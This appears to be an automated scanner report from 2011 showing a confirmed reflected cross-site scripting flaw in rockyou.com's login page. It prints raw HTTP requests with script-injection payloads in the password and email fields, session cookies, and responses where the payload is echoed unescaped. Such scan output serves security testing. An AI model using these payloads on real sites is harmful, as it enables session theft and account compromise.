userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x0006EB)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x0006EB)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916&q..
Date: Mon, 18 Apr 2011 21:59:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 11:59:35 GMT; path=/; domain=.rockyou.com,lastlogin=1303163975; expires=Wed, 27-Jul-2011 21:59:35 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:35 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:35 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:35 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=93046 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9051
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'\"--></style></script><script>netsparker(0x0006EB)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'\"--></style></script><script>netsparker(0x0006EB)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916&q..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| user | POST | 3 |
| mode | POST | login |
| pass | POST | '"--></style></script><script>alert(0x000735)</script> |
Request
POST /login.php HTTP/1.1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164003; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000735)%3c%2fscript%3e
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164003; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 108
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
user=3&mode=login&pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000735)%3c%2fscript%3e
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:00:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:00:04 GMT; path=/; domain=.rockyou.com,lastlogin=1303164004; expires=Wed, 27-Jul-2011 22:00:04 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:00:04 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:00:04 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:00:04 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=89889 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9046
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000735)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 